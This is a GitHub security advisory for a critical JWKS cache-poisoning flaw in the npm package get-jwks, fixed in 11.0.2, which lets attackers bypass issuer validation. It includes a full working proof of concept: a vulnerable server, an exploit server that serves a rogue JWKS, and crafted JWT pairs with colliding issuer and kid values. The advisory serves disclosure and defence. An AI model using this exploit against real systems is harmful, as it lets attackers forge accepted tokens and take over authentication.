Skip to content

Poisoned JWKS cache allows post-fetch issuer validation bypass

Critical
simoneb published GHSA-qc2q-qhf3-235m Sep 26, 2025

Package

npm get-jwks (npm)

Affected versions

<= 11.0.1

Patched versions

11.0.2

Description

Summary

A vulnerability in get-jwks can lead to cache poisoning in the JWKS key-fetching mechanism.

Details

When the iss (issuer) claim is validated only after keys are retrieved from the cache, it is possible for cached keys from an unexpected issuer to be reused, resulting in a bypass of issuer validation. This design flaw enables a potential attack where a malicious actor crafts a pair of JWTs, the first one ensuring that a chosen public key is fetched and stored in the shared JWKS cache, and the second one leveraging that cached key to pass signature validation for a targeted iss value.

The vulnerability will work only if the iss validation is done after the use of get-jwks for keys retrieval, which usually is the common case.

PoC

Server code:

const express = require('express')
const buildJwks = require('get-jwks')
const { createVerifier } = require('fast-jwt')

const jwks = buildJwks({ providerDiscovery: true });
const keyFetcher = async (jwt) =>
    jwks.getPublicKey({
        kid: jwt.header.kid,
        alg: jwt.header.alg,
        domain: jwt.payload.iss
    });

const jwtVerifier = createVerifier({
    key: keyFetcher,
    allowedIss: 'https://example.com',
});

const app = express();
const port = 3000;

app.use(express.json());

async function verifyToken(req, res, next) {
  const headerAuth = req.headers.authorization.split(' ')
  let token = '';
  if (headerAuth.length > 1) {
    token = headerAuth[1];
  }

  const payload = await jwtVerifier(token);

  req.decoded = payload;
  next();
}

// Endpoint to check if you are auth or not
app.get('/auth', verifyToken, (req, res) => {
  res.json(req.decoded);
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

Exploit server that generates the JWT pair and send the public RSA key to the victim server:

const { generateKeyPairSync } = require('crypto');
const express = require('express');
const pem2jwk = require('pem2jwk');
const jwt = require('jsonwebtoken');

const app = express();
const port = 3001;
const host = `http://localhost:${port}`;
const target_iss = `https://example.com`;

const { publicKey, privateKey } = generateKeyPairSync("rsa",
    {   modulusLength: 4096,
        publicKeyEncoding: { type: 'pkcs1', format: 'pem' },
        privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    },
);
const jwk = pem2jwk(publicKey);

app.use(express.json());

// Endpoint to create cache poisoning token
app.post('/create-token-1', (req, res) => {
  const token = jwt.sign({ ...req.body, iss: `${host}/?:${target_iss}`,  }, privateKey, { 
    algorithm: 'RS256', 
    header: {
        kid: "testkid", 
     } });
  res.send(token);
});

// Endpoint to create a token with valid iss
app.post('/create-token-2', (req, res) => {
    const token = jwt.sign({ ...req.body, iss: target_iss ,  }, privateKey, { algorithm: 'RS256', header: {
      kid: `testkid:${host}/?`, 
    } });
    res.send(token);
  });

app.get('/.well-known/jwks.json', (req, res) => {
    return res.json({
        keys: [{
            ...jwk,
            kid: 'testkid',
            alg: 'RS256',
            use: 'sig',
        }]
    });
})

app.use((req, res) => {
    return res.json({
        "issuer": host,
        "jwks_uri": host + '/.well-known/jwks.json'
    });
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

The first JWT token will create a cache entry with the chosen public key and have the following format:

RS256:testkid:http://localhost:3001/?:https://example.com

The second JWT has a valid iss, but will create the exact same cache key as the one before, leading to signature validation with the chosen public key, bypassing any future iss validations:

RS256:testkid:http://localhost:3001/?:https://example.com

Impact

Applications relying on get-jwks for key retrieval, even with iss validation post-fetching, allows attackers to sign arbitrary payloads which will be accepted by the verifiers used.

Solution

Escape each component used in the cache key, so delimiter collisions are impossible.

get-jwks/src/get-jwks.js

Line 76 in 5780136

const cacheKey = `${alg}:${kid}:${normalizedDomain}`

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE ID

CVE-2025-59936

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Credits